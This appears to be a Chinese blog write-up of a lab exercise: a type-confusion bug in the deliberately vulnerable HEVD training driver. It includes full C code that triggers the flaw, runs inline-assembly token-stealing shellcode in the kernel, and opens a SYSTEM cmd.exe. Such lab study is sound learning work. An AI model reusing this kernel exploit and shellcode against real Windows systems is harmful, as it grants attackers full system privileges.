划水篇之hevd类型混淆漏洞利用

类型混淆漏洞一般是指把数据类型 A 当作数据类型 B 来解析和引用,这可能导致非法访问数据,进而执行任意代码。
还是熟悉的味道,还是原来的驱动
好家伙,一来就往我嘴里种水稻,直接 call 用户缓冲区偏移 4 字节处的内容。
编写一个程序观察一下结果:

#include <windows.h>
#include <stdio.h>
// Zero-filled user buffer handed to the driver (only the first 8 bytes are sent).
int buf[0xf00] = { 0 };
// Handle to the HEVD device, opened in main().
HANDLE hDriver = NULL;
// Byte count reported back by DeviceIoControl.
DWORD dwBytesOut = 0;
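// Opens the HEVD device and sends an all-zero 8-byte buffer to the
// type-confusion IOCTL. The driver calls through the second 4-byte field
// of that buffer, which is why this variant faults at address 0 (see the
// debugger output below). Returns -1 if the device or the IOCTL fails.
int main() {
	hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("[!] Unable to get a handle on the device\n");
		return -1;
	}

	// Only 8 bytes are passed; buf is zero so the called "pointer" is NULL.
	BOOL ok = DeviceIoControl(hDriver, 0x222023, buf, 8, NULL, 0, &dwBytesOut, NULL);
	if (!ok) {
		// Reached only if the driver rejects the request instead of crashing.
		printf("[!] DeviceIoControl failed: %lu\n", GetLastError());
	}
	CloseHandle(hDriver);
	return ok ? 0 : -1;
}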

果不其然,直接 call 0 去了。
我也是醉了,说好的类型混淆漏洞呢,我怀疑是 IDA 解析的问题……(其实这正是类型混淆点:驱动内核侧对象把类型字段和回调函数指针放在同一个 union 里,所以用户缓冲区的第二个字段被当作函数指针直接调用了。)不管了,反正替换成 shellcode 地址直接提权。

#include <windows.h>
#include <stdio.h>
// User buffer sent to the driver; buf[1] is later set to the payload address.
int buf[0xf00] = { 0 };
// Device handle returned by CreateFileA in main().
HANDLE hDriver = NULL;
// Output byte count filled in by DeviceIoControl.
DWORD dwBytesOut = 0;
// Kernel-mode payload reached through the confused callback pointer.
// Starting from the current thread it walks the process list to the SYSTEM
// process and copies that process's token over the current process's token.
// NOTE(review): every offset below is hard-coded for one particular 32-bit
// Windows build; they are not portable and must be confirmed against the
// target before use. The function never returns a value to C code — it
// ends in a bare `ret` back into the driver.
static VOID ShellCode()
{
	_asm
	{
		int 3					// Kernel-debugger breakpoint (the matching one before ret is commented out)
		pushad					// Preserve all general registers for the driver
		mov eax, fs: [124h]		// Find the _KTHREAD structure for the current thread
		mov eax, [eax + 0x50]   // Find the _EPROCESS structure
		mov ecx, eax			// ecx = current _EPROCESS (kept for the token write below)
		mov edx, 4				// edx = system PID(4)

		// The loop is to get the _EPROCESS of the system
		find_sys_pid :
		mov eax, [eax + 0xb8]	// Find the process activity list
		sub eax, 0xb8    		// List traversal
		cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
		jnz find_sys_pid

		// Replace the Token
		mov edx, [eax + 0xf8]
		mov[ecx + 0xf8], edx
		popad					// Restore registers before returning to the driver
		//int 3
		ret
	}
}
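// Opens the HEVD device, points the second field of the user buffer at
// ShellCode, triggers the type-confusion IOCTL and then starts cmd.exe.
// Returns -1 if the device cannot be opened or either call fails.
int main() {
	hDriver = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE) {
		printf("[!] Unable to get a handle on the device\n");
		return -1;
	}

	// The driver calls through buf[1]; the cast assumes a 32-bit build, where a
	// function address fits in an int.
	buf[1] = (int)&ShellCode;
	BOOL ok = DeviceIoControl(hDriver, 0x222023, buf, 8, NULL, 0, &dwBytesOut, NULL);
	CloseHandle(hDriver);
	if (!ok) {
		printf("[!] DeviceIoControl failed: %lu\n", GetLastError());
		return -1;
	}

	// Use the W variant of the struct so no cast is needed for CreateProcessW.
	STARTUPINFOW si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	// CreateProcessW may write to its command-line argument, so it must be a writable buffer.
	WCHAR wzFilePath[MAX_PATH] = L"cmd.exe";
	if (!CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) {
		printf("[!] CreateProcessW failed: %lu\n", GetLastError());
		return -1;
	}
	// The child keeps running; release our references to its handles.
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	return 0;
}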

他妈的,什么都没学到

